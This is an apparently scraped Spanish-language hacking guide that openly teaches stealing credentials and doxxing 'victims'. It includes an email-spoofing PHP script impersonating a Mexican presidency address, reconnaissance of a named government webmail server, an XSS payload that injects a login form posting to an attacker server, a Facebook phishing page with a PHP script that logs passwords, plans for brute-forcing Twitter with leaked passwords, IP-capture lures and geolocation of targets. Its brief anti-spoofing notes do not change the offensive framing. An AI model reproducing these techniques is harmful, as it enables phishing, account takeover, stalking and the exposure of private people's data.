You are on page 1of 39

Autor: Kelvin Parra

Twitter
Facebook
Hacking Social
- Una buena cantidad de tcnicas que pueden ayudarte a robar credenciales -
- Autor: Kelvin Parra -

Kelvin security: Durante un tiempo nuestras tcnicas se basaron email


spoofing o utilizar phishing cada dia crece mas la cantidad de tcnicas que
faltan por ser desarrolladas podemos hoy en da crear una aplicacin falsa en
redes sociales o simplemente infectar el navegador con un potencial
Troyano para recibir credenciales de distintas redes sociales y estas ser
almacenadas en una pgina externa.

en el caso de kelvinsecurity puedes conseguir nuestros ataques Aqui! en


nuestro canal en pastebin estos ataques son realizados mayormente por SQLi
Injection pero no podemos tomar una contrasea que el usuario establece por
defecto en otra pgina muchas veces estas no suelen ser las correctas para
autentificarse en una red social o pgina bancaria pero lo que s podemos
realizar es un ataque directo a estos correos electrnicos hoy aprenders
distintas tcnicas y sobre todo manipulando la mente de nuestras vctimas y
tener el control sobre ellas.

como ejemplo puedes observar esa credencial bsicamente estas credenciales


nunca identificaran sabemos que esta credencial conocido como cristian es
una contrasea por defecto que hemos encontrada de categora Information
disclosure claro una fuga de datos tenemos que tener claro que las
contraseas ms utilizadas son cristian1992 como ejemplo.
1 - Doxeando A Mi Vctima

plicaremos el mtodo de doxeo necesitamos informacin de una persona saber


A
todos sus contactos y sus direcciones e informacin personal nos basamos en una
bsqueda de Regiones si la vctima es de mexico utilizaremos los portales como
ejemplo de consultas por medio de D.N.I en reas de pagos en lnea historial
universitario registro nacional y posibles paginas sociales.

- informacin darknet

como observaras en la darknet se ha prestado mucho para esto existen portales


donde puedes publicar datos de tus vctimas creando un directorio en formato de
text/plain con informacin personal:

Qu Informacin?

- Correo Electrnico
- Celular Y Telfono Personal y Local
- Direccin De Vivienda Exacta
- GeoLocalizacin
- SSN
- Historial Bancario
- Chats Y Amigos
- Contraseas Dbiles
- Redes Sociales Perfiles
- Historial De Trabajo
en otros casos tambin podemos incluir informacin de los servicios bsicos de
nuestra vctima.
Herramientas:

Pipl - Busca informacin social perfiles de usuario y registros


Spokeo - Busca Perfiles Sociales De Usuario
Linkedin - empleo asocia gran cantidad de usuarios
instantcheckmate Records People Busca Personas
beenverified - Busca personas nombres
ReversephoneNumber - Nmeros Telefnicos
whitepages - Buscar Nmeros Telefnicos
Validador De SSN
Buscar SSN Y Personas
Dorks buscando con ellas:

antes de seguir e aca la tabla de comandos:

ext especifica el formato de bsqueda

inurl bsqueda mediante direccin url

site especificacin del portal

| barra separadora de bsqueda

Podemos obtener informacin pblica de portales una de ella son los currculos
podramos utilizar esta bsqueda de currculos por medio de dorks de igual manera
podramos consultar a Linkedin.

- Ejemplo site:mx ext:pdf curriculum vitae

Tambin podemos incluir un nombre y por arte de magia quizs sea el de nuestra
vctima.

- Resultado site:mx ext:pdf curriculum vitae Ignacio Eduardo


- Dorks utilizando redes sociales

Es importante las dorks en el entorno de las redes sociales podemos aplicar el


site y quizs un formato o nombre de nuestra vctima.

site:plus.google.com (nombre)
site:linkedin.com (nombre)
site:twitter.com (nombre)
site:paypal.com/cgi-bin (nombre)
-
- bsqueda por nombre de usuario

- Perfil Gmail Google

- Perfil Linkedin
- Perfil Twitter

- Historial Paypal

_ Tomando en cuenta las dorks y la bsica bsqueda de buscadores de manera


automatiza podemos calcular un perfil correcto de nuestra vctima.

- especificando una bsqueda en perfil


1 - Realizando Un Ataque Directo STMP

La costumbre de hoy en da en que un gobierno gasta 15.000.00 dlares en una


plataforma como zimbra no se han salvado muchas veces se trata de utilizar una
contrasea por defecto o una contrasea dbil estas tcnicas suelen ser
rpidamente tomadas.

- puerto stmp en servidores .gob.mx

Cantidad:

Postfix smtpd 37
Microsoft Exchange smtpd 26
Barracuda Networks Spam Firewall smtpd 5
MailEnable smptd 4

Estos productos de correo electrnico pueden ser mucho ms vulnerables excepto


Microsoft Exchange stmpd el cual ha recibido mucho soporte despus de pasar por
intentos de ataques.

STMP: El protocolo de transferencia de correo simple (SMTP) se ha convertido en


el protocolo estndar de Internet para el correo electrnico. Utilizado a menudo
en entornos UNIX y Linux SMTP est ahora conectado de forma ntegra a productos
de correo como Microsoft Exchange. Los servicios SMTP en IIS proporcionan
opciones administrativas para la entrega y la seguridad del correo.
Email Spoofing: Email spoofing no es ms que la suplantacin de correo stmp en
una tcnica de email spoofing se puede incluir la bsica aquellas de realizar spam
a otros correos alternativos de la web suplantada para realizar ingeniera social,
spam o envo de malware,phishing.

Script PHP bsico:

<?php
$to = "MiVictima@gmail.com";
$subject = "Cabeza Titulo";
$txt = "Contenido de mensaje";
$headers = "From: support@presidencia.gob.mx";
mail($to,$subject,$txt,$headers);
?>

$to = destinatario
$subject= titulo cabeza de mensaje
$txt= mensaje
$headers=From: Correo A Suplantar

Si no est configurado el servidor para prevenir la suplantacin de identidad


podemos aplicar el email spoofing nuestro servidor tambin debe estar configurado
para el uso STMP debemos correr el script en nuestro servidor y ejecutarlo.

Escenario de ataque: Cualquier usuario es vctima a la suplantacin de su


servidor de correo.

PoC: Correo falso en la bandeja de entrada del dominio de correo.

- Scanner con dnsdumpster


Seguridad anti spoofing:

- Toma De Acciones Anti Spoofing

SPF: Es una proteccin contra la falsificacin de direcciones en el envo de


correo electrnico. Identifica, a travs de los registros de nombres de dominio
(DNS), a los servidores de correo SMTP autorizados para el transporte de los
mensajes. Este convenio busca ayudar para disminuir abusos como el spam y otros
males del correo electrnico.

DKIM: El sistema DKIM (DomainKeys Identified Mail) es una evolucin del sistema
DomainKeys desarrollado inicialmente por Yahoo como un mecanismo para que un
mail pueda ser validado por un destinatario comprobando de forma inequvoca que
el origen del mismo es realmente el que aparece en las cabeceras del email.

DMARC: Despus de establecer los sistemas SPF y DKIM, puedes configurar DMARC
aadiendo polticas a los registros DNS de tu dominio en forma de registros TXT
igual que con SPF y con ADSP.
Ataque Al Servidor STMP

- Escenario De Ataque

Como tal SMTP VRFY Scanner no es un ataque directo pero si el servidor SMTP
tiene activadas algunas opciones que podan conducir potencialmente a la
informacin de fuga de direcciones de correo electrnico esto si puede conducir a
un ataque directo.

Esta es una secuencia de comandos python que intenta conectarse en el


puerto 25 y realiza la enumeracin automtica del nombre de usuario a travs
del comando vrfy suministrando un archivo .txt con nombres de usuario.

Script Lenguaje Python: http://pastebin.com/YiA1XtuW


Consejo de prevencin:

Problema En General:

El servidor SMTP tena activadas algunas opciones que podan conducir


potencialmente a la informacin de fuga de direcciones de correo electrnico
utilizando el comando VRFY.

Tambin se encontr que el ETRN era - al menos en cierta medida - abusable.


Ninguno de los comandos conduce a una explotacin directa. El servidor SMTP no
funciona como un rel abierto.

Tomar En Cuenta:

El proveedor de servicios responsable del servidor SMTP deshabilita el comando


VRFY y limita el uso del comando ETRN.
1 - Aplicando Email Spoofing

Aplicaremos el script bajo una extensin .php en nuestro servidor o ejecucin


desde la terminal.

<?php
$to = "MiVictima@gmail.com";
$subject = "Cabeza Titulo";
$txt = "Contenido de mensaje";
$headers = "From: support@presidencia.gob.mx";
mail($to,$subject,$txt,$headers);
?>

- Email spoofing lleg a buzn correctamente

El email spoofing es una tcnica muy buena en caso que quieras aplicar ingeniera
social o engaar a tu vctima con un falso seuelo.

- dork site:presidencia.gob.mx @presidencia.gob.mx


TheHarvester:

TheHarvester es una herramienta que podemos utilizar para extraer correos de


un dominio selectivo a ti se ejecuta desde la terminal y se basa en lenguaje python
ahora tambin incorpora a shodan como motor de busqueda en momentos de
anlisis al servidor como por ejemplo Presidencia.gob.mx.

recientemente fue incluido shodan existe la anterior versin

GITHUB

- iniciando harvester desde la terminal Windows


Comandos De Harvester:
Comandos:

theharvester.py -d microsoft.com -l Bsquedas mediante el motor de


500 -b google bsqueda Google

theharvester.py -d microsoft.com -b Bsquedas Mediante pgp


pgp

theharvester.py -d microsoft -l 200 -b Bsquedas mediante linkedin


linkedin

-d Dominio a buscar o nombre de la


empresa

-b Fuente de datos (google, baidu, bing,


bingapi, pgp, linkedin, google-profiles

-s Inicio en el nmero de resultado X


(valor predeterminado 0)

-v Compruebe el nombre de host


mediante resolucin DNS y busque
hosts virtuales

-f Guarde los resultados en un archivo


HTML y XML

-n Realiza una consulta inversa de DNS en


todos los rangos descubiertos

-c Realiza una fuerza bruta de DNS para


el nombre de dominio

-t Realizar un descubrimiento de
expansin de TLD DNS

-e Utilice este servidor DNS

-l Limite el nmero de resultados a


trabajar con (bing va de 50 a 50 res
lts,
Buscando La Plataforma A WebMailer:

En pginas de gobierno y empresariales toman la preferencia para sus


trabajadores utilizar la plataforma como existen por ejemplo:

mail.presidencia.gob.mx
correo.presidenca.gob.mx
stmp.presidencia.gob.mx

todo ello para que entre personal de gobierno o trabajadores del estado por
ejemplo para saber su direccin es necesario echarle un ojo al MX y para ello
utilizamos Dnsdumpster y la extensin o un scanner de puertos como Nmap o
auto deteccin como shodan utilizando su extensin para navegadores lo puedes
descargar Aqui!.

MX Records ** This is where email for the domain goes...

0 201.140.104.80 AS18734 Operbes, S.A.


correo3.presidencia.gob.mx. de C.V.
correo3.presidencia.gob.
mx Mexico

DnsDumpster

si observan mas abajo se encuentra c0rre0.presidencia.gob.mx la cual es la


direccion correcta una vez que entramos nos pide credenciales .

pero si entramos veremos un servidor stmp diferente.


Bajo HTTPS puerto 443:

HTTP/1.1 401 Unauthorized


Server: Microsoft-IIS/8.5
request-id: 493b3069-c306-4ffd-be28-26c1acf75901
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
WWW-Authenticate: Basic realm="c0rre0.emp.gob.mx"
X-Powered-By: ASP.NET
X-FEServer: EXCH16V02
Date: Fri, 25 Nov 2016 06:25:01 GMT
Content-Length: 0

como vemos la autentificaion es a emp.gob.mx pero esta bloqueado por :

WWW-Authenticate: Basic realm=

para que nosotros observemos la estructura del webmailer debemos saltar esa
barrera es utilizado por muchos y otros utilizan el tpico mtodos de realizar un
ataque de fuerza bruta para lograr autentificar en esa barrera.

- producto Outlook Web Access

- vulnerabilidad bsicas:

Un WebMailer puede ser vulnerable a distintos mtodos:

DoS: Bloqueo De Usuario Tras Mltiples Intentos De Accesos O Acciones


Brute Force: Automatizacion De Intentos De Acceso A Cuenta De Usuario
Open Redirect:
mediante de un parmetro de redireccin redirect_uri=www.malware.com se
redirige a la vctima.
Open Redirect:

mediante una sesin iniciado hackers han llegado a burlar la seguridad desviando
la direccin en este ejemplo redirect_uri=(pagina) en este caso se trata del acceso
a una plataforma de correo.

Dork: inurl:oauth/authorize inurl:redirect_uri=

Ejemplo:

https://www.ejemplo.com/oauth/authorize?response_type=code&client_id=(ID)
&redirect_uri=malware.com/code.php&scope=user

Informacin Sobre Oauth:

Las aplicaciones normales de oauth aaden automticamente la etiqueta http:


// sin mencionar. El desarrollador pierde o deja de usar la tercera devolucin de
llamada porque obtiene un https: // o por alguna razn. Ataque normalmente o
afortunadamente encuentra que la devolucin de llamada est redirigiendo a algn
dominio que no est registrado entonces atacante registra el dominio y roba el
cdigo oauth generado .Este es un error en algunos casos es cuestin de seguridad.

REFERENCIA 1

REFERENCIA 2

Descripcin Segn OWZAP:

OWZAP: Los redireccionamientos y reenvos no validados son posibles cuando


una aplicacin web acepta entrada no fiable que podra hacer que la aplicacin
web redirija la solicitud a una direccin URL contenida en la entrada no confiable.
Al modificar la entrada de URL no fiable a un sitio malicioso, un atacante puede
iniciar con xito una estafa de phishing y robar credenciales de usuario. Dado que
el nombre del servidor en el vnculo modificado es idntico al sitio original, los
intentos de phishing pueden tener una apariencia ms confiable. Los ataques de
redireccionamiento y de reenvo no validados tambin se pueden usar para crear
una URL maliciosa que pase la comprobacin del control de acceso de la aplicacin
y luego reenve al atacante a funciones privilegiadas a las que normalmente no
podran acceder.
2 - Phishing + Content Spoofing

l phishing es un mtodo que ha recorrido por ordenadores de todo el mundo


E
existen phishing por Content Spoofing que no es ms que aprovechar de una
vulnerabilidad (Cross Site Scripting) y agregar Forms en HTML que tomen los datos
y ser almacenados en un servidor externo a l e aca un ejemplo de content
spoofing:

- nota: el parmetro forms_show_error= est relacionado con el error

e utilizaremos el script <script>document.body.innerHTML= para ocultar el FORM


de Forgot Password.

muy bien a continuacin necesitamos agregar otro form aprovechando la


vulnerabilidad cross site scripting (XSS) para robar las credenciales-
Ocultar Form:

<script>document.body.innerHTML=

Form Para Agregar:

<h3>Please Enter Your Username and Password to Proceed:</h3><form


method="POST"
action="http://attackerserver/login.php">Username: <input type="text"
name="username" /><br />Password: <input type="password"
name="password" /><br /><input type="submit" value="Login" /></form>

Modificacin:

method=POST action=www.mipagina.com/funcion.php - agregar tu servidor


con el PHP script que usualmente utilizamos en phishing-

- Ejemplo Content Spoofing

Funcin Completa:

https://sw.shop.ca/supplierworld/forgot_password.php?forms_action=forgot_pa
ssword1&forms_show_error=<script>document.body.innerHTML=<center><h1>K
elvinSecurity</h1><form%20name=login%20action=index.php%20method=post>Us
ername:<input%20type=text%20name=username><br>Password:<input%20type=p
assword%20name=password><br><input%20type=submit%20value=Login%20name=
submit></form></center>;</script>
Phishing para facebook o Twitter:
Podemos crear y enviar una imagen que funcione como clickjacking al momento
de clickear la funcin que debe tomar es el redireccionamiento a la pgina falsa de
nuestro servidor si no emite HTML puede ser alguno como este:

- Ejemplo en webmailer Horde

Hola, Betsy:

Te registraste recientemente en Facebook. Para completar tu registro en


Facebook, confirma tu cuenta.

Gracias.
El equipo de Facebook

Es posible que debas ingresar este cdigo de confirmacin:

xxxxx

Facebook te ayuda a comunicarte con tus amigos y a mantenerte en contacto


con ellos. Cuando te unas a Facebook podrs compartir fotos, planificar eventos
y mucho ms.

En Gmail - Hotmail se suele visualizar de forma diferente en contenido HTML


Requisitos:
1) phishing montado en el servidor
2) Email Spoofing + PHP script
3) Infraestructura Bsica Y Comparacin entre un webmailer y gmail o hotmail.

Para crear un phishing lo haremos de la siguiente forma:

- Infraestructura Facebook

- HTML CODE

- PHP SCRIPT
HTML CODE MODIFICACIN:

Vincular PHP SCRIPT En Action para dar la funcin al momento de presionar


el botn entrar.

<form id="login_form" action="conectar.php" method="post"

USUARIO:

<input type="hidden" id="lgnjs" name="lgnjs" value="n" /><div class="clearfix


_5466 _44mg"><input type="text" class="inputtext _55r1 inputtext _1kbt
inputtext _1kbt" name="email" id="email" tabindex="1" placeholder="Correo
electr&#xf3;nico o n&#xfa;mero de tel&#xe9;fono" value=""

CONTRASEA:

<input type="password" class="inputtext _55r1 inputtext _1kbt inputtext _1kbt"


name="pass" id="pass" tabindex="1" placeholder="Contrase&#xf1;a"
aria-label="Contrase&#xf1;a" />

PHP SCRIPT: Funcion de guardar contraseas en html.

<?php

$usuario = $_POST[ 'email' ];


$password = $_POST[ 'pass' ];
$ip = $_SERVER[ 'REMOTE_ADDR' ];

if( ( empty($usuario)) or (empty($password)) ){


header('location: index.htm');
}else{
//guarderemos en un archivo de texto
$file = fopen('clave.txt','a+');
fwrite($file, "usuario: ".$usuario."\r\ncontrasea: ".$password."\r\nIP:
".$ip."\r\n=========================\r\n");
fclose($file);
header('location: http://facebook.com/');

}
3 - Bsqueda De Correos Comprometidos

- Me Han Hackeado?

abemos de los leaks que se han presentado ltimamente hoy en da han creado
S
buscadores que hacen posible buscar tu direccin de correo dentro de esa base de
datos para visualizar si tu correo est comprometido con uno de estos masivos
leaks de igual manera las bsquedas en portales donde ltimamente se realizan
estos leaks.

Bsqueda mediante la API:

He Sido Hackeado Direccion

Resultado En Pastebin
- Restos de las fugas

- Informacin detallada de fugas

- Otras Fuentes:
- Fuente

- Infraestructura (DB)
3 - Listado De Contraseas Comprometidas

VK Password List

Ventaja: Un usuario podra buscar estas dbs y utilizar la contrasea por defecto
contra su vctima.
Ventaja:
Mediante estos ltimos leaks se puede realizar un diccionario de contraseas que
fueron utilizadas para realizar un ataque de fuerza bruta en otras paginas sociales
el problema es que tanto como Twitter y Facebook bloquean los intentos de acceso
Bloqueando Temporalmente Tu Direccin IP pero no quedara tomar estas
contraseas que fueron las ms utilizadas y crear nuestro propio diccionario.txt

Fuerza Bruta Twitter:


Podemos tomar a twitter como un ejemplo para realizar ataques de fuerza bruta
anteriormente los ataques fueron realizados sin problemas y luego con el tiempo
fueron tomados por soporte tcnico para evitar el intento de sesin.

- mobile.twitter.com

- Bloqueo de acceso Twitter

Script
3 - Capturar Direccin IP Mediante Seuelo

En un doxing puedes incluir la direccin IP de tu vctima para ello generamos una


direccin o creamos un script en nuestro servidor que sea capaz de realizar esta
funcin.

Capturar IP Vinculo

- Gestiona 2 links como seuelo

Info: Al momento de la vctima entrar en el enlace la direccin IP con detalles ser


enviada a tu direccin de correo.
3 - Geolocalizacin IP

Por medio de longitud y latitud utilizando el mapa virtual de google maps u


otros como mapbox se suelen localizar nuestra vctima una vez aplicado la accin
de captacin de direccin IP.

podemos basarnos de una herramienta ejecutada desde la terminal para realizar


una bsqueda que en realidad funciona mediante un servidor web la herramienta
conocida como Tweepy tiene comprometido a muchos usuarios con el objetivo en
que tu dando uso a esta herramientas puedes geolocalizar un usuario de twitter.

Qu Es GeoLocalizacion?

La geolocalizacin es la capacidad para obtener la ubicacin geogrfica real


de un objeto, como un radar, un telfono mvil o un ordenador conectado a
Internet. La geolocalizacin puede referirse a la consulta de la ubicacin, o
bien para la consulta real de la ubicacin. El trmino geolocalizacin est
estrechamente relacionado con el uso de sistemas de posicionamiento.
Herramientas De Monitoreo Y Para En Redes Sociales:

tinfoleak es una herramienta automatizada que permite detallar el uso de la


cuenta de twitter de tu victima esta herramienta podr verificar que aplicacin de
twitter podra estar utilizando este individuo para autenticacin e incluso datos
como desde qu dispositivo se suele conectar.

Detalles De Funciones:

Informacin bsica sobre un usuario de Twitter (nombre, imagen, ubicacin,


seguidores, etc.

Dispositivos y sistemas operativos utilizados por el usuario de Twitter

Aplicaciones y redes sociales utilizadas por el usuario de Twitter

Lugar y coordenadas de geolocalizacin para generar un mapa de seguimiento de


las ubicaciones visitadas
Muestre tweets de usuario en Google Earth!

Descargar todas las fotos de un usuario de Twitter

Hashtags utilizados por el usuario de Twitter y cundo se utilizan (fecha y hora)

Usuario menciona por el usuario de Twitter y cuando se producen (fecha y hora)


Temas utilizados por el usuario de Twitter
- Photo Metadata

- Geolocalizacin

No se me quedara atrs y existe 2 formas de obtener estos datos puede ser por
medio de esta estructura o por medio de una terminal.

Infraestructura

Open Source
Geolocalizacin IP:

No es muy complicado y menos llevar mucho que hacer pues solo se trata de
consultar la direccin para obtener detalles sobre esta IP.

Datos Por Obtener:

ASN
City
Country
Country Code
ISP
Latitude
Longtitude
Organization
Region Code
Region Name
Timezone
Zip Code

Detalles que proporciona ip2geolocation desde la terminal suelen ser los mismos
que en ip2geolocation.com pues la funcion basica es consultar al servidor.

http://ip2geolocation.com/?ip=
3 - Information Disclosure Y Metadatos:

Metadatos: dentro del entorno de bsqueda de datos que proporcionan los ficheros
sea documentos e imgenes en otros casos Audios este mtodo se aplica en la
informtica forense en doxing o cualquiera otra investigacin independiente se
realizan estos trabajos.

Information Disclosure: En pentesting information disclosure se da a conocer


como un usuario Identificado mediante un error que se expone en un servidor o
data expuesta. en forma general information disclosure podra tratarse de lo
mismo y cuando aplicamos metadatos podemos darnos cuenta qu information
disclosure si est all y no es ms que un nombre de usuario o autor. las tcnicas
de distintos hackers a nivel mundial es sacar metadatos con nombre de usuarios de
documentos de paginas Objetivos para luego crear una coleccin de ellas y
aplicar ataques de fuerza bruta utilizando cada uno de estos usuarios.
Metadatos en fotografas:

- ejemplo de metadatos en fotografas

La foto que ven como ejemplo fue una fotografa que caus gran importancia
durante tiempos de guerra los terroristas toman fotografas y las publican en redes
sociales pues esta es un ejemplo de como se ha podido localizar mediante
geolocalizacin e identificar un tipo de cmara utilizada.

por defecto en Windows tiene su visualizador de fotografa y luego un botn en


la barra de opcione para detallar la fotografa resulta que aunque descarguemos
cualquier otro software como es Foca podra realizar la misma funcin y gestionar
los mismos Metadatos de forma que lo hubiramos hecho por defecto con las
herramientas que incluye el sistema operativo.
Exiftool:

Para su descarga ingresamos a la pgina Oficial de acuerdo a ti sistema operativo


de igual manera lo ejecutaremos desde una terminal puede ser desde windows o
simplemente podemos descargar para visualizarlo de manera diferente como GUI
version ExifToolGUI .

Herramientas:
geosetter metadata extractor
logipole metadata extractor
ulfwood Metadata Extractor
Foca Metadata Extractor

- Formatos que procesa ExiftTool


-

- Metadatos a extraer dentro del formato

- Sencilla automatizacin a la fotografa extraccin de metadata


- comando : exiftool.exe -v metadata.jpg

- o simplemente: exiftool.exe -v datos.jpg


- borrando metadatos

- Resultado del borrado de metadatos

Extraer metadatos de documentos:

comparado con el information disclosure nuestro objetivo sera identificar un


sistema operativo, software y datos de autor y nombres de usuario.
Utilizando Foca Extraer Metadatos:

Descargar FOCA
-

Descripcion: Los documentos que es capaz de analizar son muy variados, siendo
los ms comunes los archivos de Microsoft Office, Open Office, o ficheros PDF,
aunque tambin analiza ficheros de Adobe InDesign, o svg por ejemplo.

Estos documentos se buscan utilizando tres posibles buscadores que son Google,
Bing y Exalead. La suma de los tres buscadores hace que se consigan un gran
nmero de documentos. Tambin existe la posibilidad de aadir ficheros locales
para extraer la informacin EXIF de archivos grficos, y antes incluso de descargar
el fichero se ha realizado un anlisis completo de la informacin descubierta a
travs de la URL.

- men para uso de bsqueda mediante dorks

sabemos las funciones bsicas en dorks y muestra 3 motores de bsqueda como


Google O Bing sabemos las funciones bsicas:

site: especificar una pgina web


filetype: especificar el formato.
- otra funcion basica de foca es inspeccionar la seguridad del portal web que
estamos analizando para la bsqueda de estos documentos.

bien volvemos a metadata y arrastramos un documento PDF o DOC y luego


presionamos sobre el click derecho y presionamos en extraer metadata el que
quieras y extraemos sus metadatos

- ejemplo durante la extraccin de metadatos

You might also like